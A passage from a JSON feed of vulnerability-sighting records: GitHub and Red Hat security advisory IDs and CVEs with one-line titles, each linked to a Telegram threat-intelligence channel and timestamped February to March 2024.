"https://ift.tt/Sh1EqXy\n[GHSA-wj85-w4f4-xh8h] Denial of service via regular expression", "creation_timestamp": "2024-03-18T21:46:17.000000Z"}, {"uuid": "f1b87526-0b8e-48f8-a465-fb86e8a4d580", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VCC3-RW6F-JV97", "type": "seen", "source": "https://t.me/ctinow/210983", "content": "https://ift.tt/uGITJd5\n[GHSA-vcc3-rw6f-jv97] Use-after-free in libxml2 via Nokogiri::XML::Reader", "creation_timestamp": "2024-03-18T21:46:24.000000Z"}, {"uuid": "e9d5ea31-14b2-4851-a861-cf54df267bf0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-68MJ-9PJQ-MC85", "type": "seen", "source": "https://t.me/ctinow/210982", "content": "https://ift.tt/SYihIk9\n[GHSA-68mj-9pjq-mc85] Intermittent HTTP policy bypass", "creation_timestamp": "2024-03-18T21:46:23.000000Z"}, {"uuid": "a70eb093-c7f7-4933-a79c-6c6a1f848741", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1353", "type": "seen", "source": "https://t.me/ctinow/210386", "content": "https://ift.tt/aOtpzsx\nRHSA-2024:1353: Important: Red Hat Process Automation Manager 7.13.5 security update", "creation_timestamp": "2024-03-18T11:21:13.000000Z"}, {"uuid": "d053b6b2-7b8f-4ba2-a1a5-fee8d4a99c26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1348", "type": "seen", "source": "https://t.me/ctinow/210221", "content": "https://ift.tt/pFCmr5w\nRHSA-2024:1348: Important: postgresql:10 security update", "creation_timestamp": "2024-03-18T07:16:54.000000Z"}, {"uuid": "f0cf8e27-d97f-470e-8829-9fe09d790c19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0228", "type": "seen", "source": "https://t.me/ctinow/204285", "content": "https://ift.tt/McWtxLV\nCVE-2019-1352 | Microsoft Visual Studio Git input validation (RHSA-2020:0228)", "creation_timestamp": "2024-03-10T15:16:17.000000Z"}, {"uuid": "29de9954-2c12-45b6-b37d-8b33dc30fcb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204137", "content": "https://ift.tt/1Tykrqt\nCVE-2019-13762 | Google Chrome prior 79.0.3945.79 Download input validation (RHSA-2019:4238)", "creation_timestamp": "2024-03-10T08:11:20.000000Z"}, {"uuid": "44e36113-0681-4abc-b951-3c5ca553d8b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C5Q2-7R4C-MV6G", "type": "seen", "source": "https://t.me/ctinow/202895", "content": "https://ift.tt/XP8dn5K\n[GHSA-c5q2-7r4c-mv6g] Go JOSE vulnerable to Improper Handling of Highly Compressed Data (Data Amplification)", "creation_timestamp": "2024-03-08T00:07:20.000000Z"}, {"uuid": "fb8fb253-494a-48c2-95d6-101a2184bd5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJ98-CRF4-G69W", "type": "seen", "source": "https://t.me/ctinow/202890", "content": "https://ift.tt/IquQB9w\n[GHSA-rj98-crf4-g69w] pgAdmin 4 vulnerable to Unsafe Deserialization and Remote Code Execution by an Authenticated user", "creation_timestamp": "2024-03-07T23:47:20.000000Z"}, {"uuid": "11b8908f-74fd-406e-b02e-4541115efbcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/203976", "content": "https://ift.tt/aSltU78\nCVE-2019-13729 | Google Chrome prior 79.0.3945.79 WebSocket HTML Page use after free (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T15:46:48.000000Z"}, {"uuid": "3e766d7d-6389-41d4-a7c2-e3a7eda049dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/203975", "content": "https://ift.tt/FWxEUor\nCVE-2019-13728 | Google Chrome prior 79.0.3945.79 Javascript HTML Page out-of-bounds write (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T15:46:47.000000Z"}, {"uuid": "3f8b43ec-1fc5-4d3a-b7dc-d2516e7bde60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G654-5QJF-G6CX", "type": "seen", "source": "https://t.me/ctinow/200067", "content": "https://ift.tt/W64riov\nCVE-2019-16767 | ezmaster 5.2.11 Admin Sys Mode unnecessary privileges (GHSA-g654-5qjf-g6cx)", "creation_timestamp": "2024-03-05T10:12:46.000000Z"}, {"uuid": "4db36b15-957e-46ff-bb0b-913363c278db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0204", "type": "seen", "source": "https://t.me/ctinow/200062", "content": "https://ift.tt/Iv6beJm\nCVE-2019-14901 | Linux Kernel up to 3.x/4.17.x Marvell Wifi Chip Driver resource consumption (RHSA-2020:0204)", "creation_timestamp": "2024-03-05T10:12:40.000000Z"}, {"uuid": "46e66074-8a12-46a6-9d62-c6b83b6fb0f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0328", "type": "seen", "source": "https://t.me/ctinow/200049", "content": "https://ift.tt/LIoK5vw\nCVE-2019-14895 | Linux Kernel up to 3.x/4.17.x Marvell Wifi Chip Driver heap-based overflow (RHSA-2020:0328)", "creation_timestamp": "2024-03-05T09:42:29.000000Z"}, {"uuid": "eb476fc7-f93d-492a-92e5-48f40fdbacd5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0335", "type": "seen", "source": "https://t.me/ctinow/200047", "content": "https://ift.tt/8ueo09k\nCVE-2019-14865 | grub2 grub2-set-bootflag privilege defined with unsafe actions (RHSA-2020:0335)", "creation_timestamp": "2024-03-05T09:42:26.000000Z"}, {"uuid": "a6c68569-cb93-4373-a4a3-6a297ae4e9b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0228", "type": "seen", "source": "https://t.me/ctinow/204282", "content": "https://ift.tt/xv31Phz\nCVE-2019-1349 | Microsoft Visual Studio Git input validation (RHSA-2020:0228)", "creation_timestamp": "2024-03-10T15:16:14.000000Z"}, {"uuid": "f8b0bd60-b33f-4c77-a51a-e43dff0f5a0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204138", "content": "https://ift.tt/quUWEbR\nCVE-2019-13763 | Google Chrome prior 79.0.3945.79 Payment HTML Page input validation (RHSA-2019:4238)", "creation_timestamp": "2024-03-10T08:11:21.000000Z"}, {"uuid": "3f762f23-d87d-4442-9569-96abc076b201", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F2RV-4W6X-RWHC", "type": "seen", "source": "https://t.me/ctinow/205371", "content": "https://ift.tt/e9F1py7\nCVE-2019-18838 | Envoy up to 1.12.0 Route Manager Host null pointer dereference (GHSA-f2rv-4w6x-rwhc)", "creation_timestamp": "2024-03-12T08:41:44.000000Z"}, {"uuid": "4b11c9aa-1e6a-4cff-97fc-227ec21c5970", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-356M-VHW2-WCM4", "type": "seen", "source": "https://t.me/ctinow/205362", "content": "https://ift.tt/tNo4lc1\nCVE-2019-18802 | Envoy 1.12.0 HTTP Header memory corruption (GHSA-356m-vhw2-wcm4)", "creation_timestamp": "2024-03-12T08:12:32.000000Z"}, {"uuid": "c79547d3-94b6-4bcb-9f7a-1140d1554a91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4222", "type": "seen", "source": "https://t.me/ctinow/205361", "content": "https://ift.tt/SekOcGl\nCVE-2019-18801 | Envoy 1.12.0 Access Control Request memory corruption (RHSA-2019:4222)", "creation_timestamp": "2024-03-12T08:12:31.000000Z"}, {"uuid": "c81717f6-c10a-4397-91d2-81f78f0aa286", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MQ4X-R2W3-J7MR", "type": "seen", "source": "https://t.me/ctinow/205097", "content": "https://ift.tt/1NT8ijg\n[GHSA-mq4x-r2w3-j7mr] Account Takeover via Session Fixation in Zitadel [Bypassing MFA]", "creation_timestamp": "2024-03-11T22:32:29.000000Z"}, {"uuid": "a8d55a05-0634-4fcb-8731-ad9fc53b8c82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7M8G-FPRR-47FX", "type": "seen", "source": "https://t.me/ctinow/196425", "content": "https://ift.tt/b2iYgZf\nCVE-2024-24574 | thorsten phpMyFAQ up to 3.2.4 Echo attachments.php filename cross site scripting (GHSA-7m8g-fprr-47fx)", "creation_timestamp": "2024-02-29T09:56:55.000000Z"}, {"uuid": "667c9338-369b-49a8-8300-a68e3ef383ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2013:0992", "type": "seen", "source": "https://t.me/ctinow/203884", "content": "https://ift.tt/Ni9lHVP\nCVE-2013-2167 | python-keystoneclient 0.2.3/0.2.4/0.2.5 Memcache data authenticity (RHSA-2013:0992 / XFDB-85492)", "creation_timestamp": "2024-03-09T11:11:58.000000Z"}, {"uuid": "814c70af-724b-48dc-a1d7-36949fb0ea9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8WJ9-CX7H-PVM4", "type": "seen", "source": "https://t.me/ctinow/203662", "content": "https://ift.tt/y14nz3R\nCVE-2024-26132 | Element up to 1.6.11 on Android information disclosure (GHSA-8wj9-cx7h-pvm4)", "creation_timestamp": "2024-03-08T23:56:19.000000Z"}, {"uuid": "c69f8940-65ce-478a-9045-51eeda439abc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4356", "type": "seen", "source": "https://t.me/ctinow/204287", "content": "https://ift.tt/h0OFW3M\nCVE-2019-1387 | Microsoft Visual Studio Git input validation (RHSA-2019:4356)", "creation_timestamp": "2024-03-10T15:16:20.000000Z"}, {"uuid": "56472d6a-6c21-4881-9558-4fe5ed44a72d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X2VG-5WRF-VJ6V", "type": "seen", "source": "https://t.me/ctinow/204761", "content": "https://ift.tt/8jkeNQJ\n[GHSA-x2vg-5wrf-vj6v] 1Panel is vulnerable to command injection", "creation_timestamp": "2024-03-11T15:16:32.000000Z"}, {"uuid": "ca32a101-996a-45a2-91d0-c1d502b4e220", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204134", "content": "https://ift.tt/oQHL5ac\nCVE-2019-13761 | Google Chrome prior 79.0.3945.79 Omnibox Domain input validation (RHSA-2019:4238)", "creation_timestamp": "2024-03-10T07:36:55.000000Z"}, {"uuid": "461a5384-3640-49ab-bbb3-32985478fbce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204133", "content": "https://ift.tt/V1wB6e5\nCVE-2019-13759 | Google Chrome prior 79.0.3945.79 interstitials HTML Page Domain input validation (RHSA-2019:4238)", "creation_timestamp": "2024-03-10T07:36:53.000000Z"}, {"uuid": "e7a6fa1f-a311-4bed-b50e-d0c4e6f6b25f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204132", "content": "https://ift.tt/ehDFmwL\nCVE-2019-13758 | Google Chrome prior 79.0.3945.79 Navigation HTML Page input validation (RHSA-2019:4238)", "creation_timestamp": "2024-03-10T07:36:52.000000Z"}, {"uuid": "40088de2-551b-424f-a6a1-dc9764bdffac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204124", "content": "https://ift.tt/c1gEPSF\nCVE-2019-13755 | Google Chrome prior 79.0.3945.79 Extension HTML Page input validation (RHSA-2019:4238)", "creation_timestamp": "2024-03-10T07:06:39.000000Z"}, {"uuid": "5f6176df-cb48-4cf8-aad6-80ce48973eb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:2534", "type": "seen", "source": "https://t.me/ctinow/204483", "content": "https://ift.tt/sCW9BiF\nCVE-2019-14849 | 3scale up to 2.5 Session Cookie httponly insertion of sensitive information into sent data (RHSA-2019:2534)", "creation_timestamp": "2024-03-11T07:41:55.000000Z"}, {"uuid": "873b450e-63d4-44f9-94f6-07cf942bd015", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/203968", "content": "https://ift.tt/e3TcHdV\nCVE-2019-13725 | Google Chrome prior 79.0.3945.79 Bluetooth HTML Page use after free (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T15:16:33.000000Z"}, {"uuid": "f4e1d0a2-7f1c-40a2-88f5-4c991bcd5a9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2014:0816", "type": "seen", "source": "https://t.me/ctinow/204790", "content": "https://ift.tt/DNOmt36\nCVE-2014-0197 | cfme CSRF Protection Header cross-site request forgery (RHSA-2014:0816)", "creation_timestamp": "2024-03-11T15:46:39.000000Z"}, {"uuid": "59c2c0b6-67e6-498e-97ae-f8da6dc0d51e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/203979", "content": "https://ift.tt/a4WDSiP\nCVE-2019-13734 | Google Chrome prior 79.0.3945.79 SQLite HTML Page out-of-bounds write (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T15:46:52.000000Z"}, {"uuid": "6e45987c-1335-4cc1-befc-6e6a69740e3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/203978", "content": "https://ift.tt/wRAeurv\nCVE-2019-13732 | Google Chrome prior 79.0.3945.79 WebAudio HTML Page use after free (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T15:46:51.000000Z"}, {"uuid": "1c70bfe5-99eb-498b-ad3f-8e82fe039ef5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-75X2-6H4M-H6MX", "type": "seen", "source": "https://t.me/ctinow/197848", "content": "https://ift.tt/Ch8fHvW\n[GHSA-75x2-6h4m-h6mx] FullStackHero's WebAPI Boilerplate host header injection vulnerability", "creation_timestamp": "2024-03-01T18:07:03.000000Z"}, {"uuid": "279cf1e9-d32b-4f5f-aa8e-9fe19a9ca260", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VR64-R9QJ-H27F", "type": "seen", "source": "https://t.me/ctinow/197847", "content": "https://ift.tt/vfVs2Zi\n[GHSA-vr64-r9qj-h27f] Clojure Denial of Service vulnerability", "creation_timestamp": "2024-03-01T18:07:01.000000Z"}, {"uuid": "4e4c1b8c-ffc2-42f9-b886-a62065e0b5ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CFCF-94JV-455F", "type": "seen", "source": "https://t.me/ctinow/198429", "content": "https://ift.tt/C43pzHg\nCVE-2024-25107 | miraheze WikiDiscover Special:WikiDiscover Language::date cross site scripting (GHSA-cfcf-94jv-455f)", "creation_timestamp": "2024-03-02T17:41:40.000000Z"}, {"uuid": "117bbd98-b00f-476a-839f-8d80e89e4a53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3M5F-9M66-XGP7", "type": "seen", "source": "https://t.me/ctinow/198428", "content": "https://ift.tt/8RbGp0u\nCVE-2024-25106 | OpenObserve up to 0.7.x {email_id} access control (GHSA-3m5f-9m66-xgp7)", "creation_timestamp": "2024-03-02T17:41:38.000000Z"}, {"uuid": "e30075eb-c1ce-4e0c-b055-5580fbe73ce2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HFXX-G56F-8H5V", "type": "seen", "source": "https://t.me/ctinow/198427", "content": "https://ift.tt/yp2wiVd\nCVE-2024-24830 | OpenObserve up to 0.7.x Role-Based Access Control /api/{org_id}/users improper authorization (GHSA-hfxx-g56f-8h5v)", "creation_timestamp": "2024-03-02T17:41:37.000000Z"}, {"uuid": "a4af5250-07e0-43ec-9983-af9eb3546fd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22R3-9W55-CJ54", "type": "seen", "source": "https://t.me/ctinow/198612", "content": "https://ift.tt/DAcez9s\nCVE-2024-24828 | pkg default permission (GHSA-22r3-9w55-cj54)", "creation_timestamp": "2024-03-03T09:16:26.000000Z"}, {"uuid": "b2d72ae5-e0a9-4129-91e5-298d2205ef90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6845-XW22-FFXV", "type": "seen", "source": "https://t.me/ctinow/196596", "content": "https://ift.tt/V1bRh7I\nCVE-2024-24559 | vyperlang Vyper up to 0.3.10 risky encryption (GHSA-6845-xw22-ffxv)", "creation_timestamp": "2024-02-29T12:56:58.000000Z"}, {"uuid": "89375203-2569-4f4f-8583-56a6ea68d299", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22F2-V57C-J9CX", "type": "seen", "source": "https://t.me/ctinow/196006", "content": "https://ift.tt/cSdGNOE\n[GHSA-22f2-v57c-j9cx] Rack vulnerable to ReDoS in content type parsing (2nd degree polynomial)", "creation_timestamp": "2024-02-29T00:06:46.000000Z"}, {"uuid": "de3591f1-b698-453f-8989-3fb5853868f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XJ5V-6V4G-JFW6", "type": "seen", "source": "https://t.me/ctinow/196005", "content": "https://ift.tt/T1uykdL\n[GHSA-xj5v-6v4g-jfw6] Rack has possible DoS Vulnerability with Range Header", "creation_timestamp": "2024-02-29T00:06:45.000000Z"}, {"uuid": "661c6ad4-02a1-4b82-8529-b057b8dbe2a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54RR-7FVW-6X8F", "type": "seen", "source": "https://t.me/ctinow/196004", "content": "https://ift.tt/1EZGaHb\n[GHSA-54rr-7fvw-6x8f] Rack Header Parsing leads to Possible Denial of Service Vulnerability", "creation_timestamp": "2024-02-29T00:06:44.000000Z"}, {"uuid": "7b8b7d18-7184-4406-9111-2cca1fb6101e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QP56-82VP-XQGV", "type": "seen", "source": "https://t.me/ctinow/196003", "content": "https://ift.tt/gRDuoHA\n[GHSA-qp56-82vp-xqgv] Mezzanine allows attackers to bypass access control mechanisms", "creation_timestamp": "2024-02-29T00:06:43.000000Z"}, {"uuid": "8d3be4ec-b9c8-4c17-9254-12eafd329cb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0971", "type": "seen", "source": "https://t.me/ctinow/195715", "content": "https://ift.tt/aGQ3HFs\nRHSA-2024:0971: Important: firefox security update", "creation_timestamp": "2024-02-28T18:22:16.000000Z"}, {"uuid": "7fe55ddd-54b5-4792-9cbc-55f065bb8aec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6927-3VR9-FXF2", "type": "seen", "source": "https://t.me/ctinow/197992", "content": "https://ift.tt/GUPRjX7\n[GHSA-6927-3vr9-fxf2] ZDI-CAN-19105: Parse Server literalizeRegexPart SQL Injection", "creation_timestamp": "2024-03-01T21:16:43.000000Z"}, {"uuid": "4e1f4005-7eb6-4a38-b5c6-8a700739da6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4G2X-VQ5P-5VJ6", "type": "seen", "source": "https://t.me/ctinow/197991", "content": "https://ift.tt/l78jXGh\n[GHSA-4g2x-vq5p-5vj6] Budibase affected by VM2 Constructor Escape Vulnerability", "creation_timestamp": "2024-03-01T21:16:42.000000Z"}, {"uuid": "7df27daa-27d7-4814-9612-a867b1250406", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X278-4W4X-R7CH", "type": "seen", "source": "https://t.me/ctinow/198667", "content": "https://ift.tt/IAE4Sb6\nCVE-2024-23323 | envoyproxy envoy up to 1.26.6/1.27.2/1.28.0/1.29.0 resource consumption (GHSA-x278-4w4x-r7ch)", "creation_timestamp": "2024-03-03T10:46:24.000000Z"}, {"uuid": "e58d518e-53cf-40cf-aa81-2d8ba95cb00b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GQ3V-VVHJ-96J6", "type": "seen", "source": "https://t.me/ctinow/198666", "content": "https://ift.tt/fOBYxC5\nCVE-2024-23324 | envoyproxy envoy up to 1.26.6/1.27.2/1.28.0/1.29.0 Downstream ext_authz access control (GHSA-gq3v-vvhj-96j6)", "creation_timestamp": "2024-03-03T10:46:22.000000Z"}, {"uuid": "d832377c-2d9b-4da4-8ae0-43f93bdd31c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3MWP-5P5V-J6Q3", "type": "seen", "source": "https://t.me/ctinow/198419", "content": "https://ift.tt/gh9KyoW\nCVE-2024-24820 | Icinga icingaweb2-module-director cross-site request forgery (GHSA-3mwp-5p5v-j6q3)", "creation_timestamp": "2024-03-02T17:11:27.000000Z"}, {"uuid": "bb4ec33a-034b-47d5-8f3d-c47c8ab08007", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P8VV-9PQQ-RM8P", "type": "seen", "source": "https://t.me/ctinow/198414", "content": "https://ift.tt/bBfLmiP\nCVE-2024-24819 | Icinga icingaweb2-module-incubator prior 0.22.0 cross-site request forgery (GHSA-p8vv-9pqq-rm8p)", "creation_timestamp": "2024-03-02T16:46:37.000000Z"}, {"uuid": "ae6989a5-ae39-49ee-bc3c-8d443b6e2202", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-583G-G682-CRXF", "type": "seen", "source": "https://t.me/ctinow/198412", "content": "https://ift.tt/6PH8sni\nCVE-2024-23639 | micronaut-core up to 3.8.2 resource control (GHSA-583g-g682-crxf)", "creation_timestamp": "2024-03-02T16:46:35.000000Z"}, {"uuid": "789a5acc-96f0-4855-8e2c-d16920a71798", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RQXH-FP9P-P98R", "type": "seen", "source": "https://t.me/ctinow/198398", "content": "https://ift.tt/LYhxn0Q\nCVE-2024-24829 | getsentry up to 24.1.1 server-side request forgery (GHSA-rqxh-fp9p-p98r)", "creation_timestamp": "2024-03-02T15:46:18.000000Z"}, {"uuid": "83fa5a03-5ded-464c-a437-11e89de4b01e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0998", "type": "seen", "source": "https://t.me/ctinow/193979", "content": "https://ift.tt/0bYiFxX\nRHSA-2024:0998: Low: Red Hat OpenShift distributed tracing 3.1.0 operator/operand containers", "creation_timestamp": "2024-02-27T04:16:28.000000Z"}, {"uuid": "0df52a9e-afb1-40d9-a895-406e20d70908", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1325", "type": "seen", "source": "https://t.me/ctinow/210698", "content": "https://ift.tt/iX4Vr5s\nRHSA-2024:1325: Important: Red Hat JBoss Web Server 6.0.1 release and security update", "creation_timestamp": "2024-03-18T16:17:10.000000Z"}, {"uuid": "77ca5161-b5a9-4091-bbf9-2df763069a52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1210", "type": "seen", "source": "https://t.me/ctinow/206921", "content": "https://ift.tt/6gQ7Se0\nRHSA-2024:1210: Moderate: OpenShift Container Platform 4.15.2 bug fix and security update", "creation_timestamp": "2024-03-13T17:16:31.000000Z"}, {"uuid": "32e9a5e0-a20a-4be3-a3d4-d5892fa9bb49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1310", "type": "seen", "source": "https://t.me/ctinow/206859", "content": "https://ift.tt/XYLloKM\nRHSA-2024:1310: Moderate: .NET 8.0 security update", "creation_timestamp": "2024-03-13T16:22:15.000000Z"}, {"uuid": "57971bce-aa3a-45b8-8217-2ef01fb29a5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4M6J-23P2-8C54", "type": "seen", "source": "https://t.me/ctinow/207545", "content": 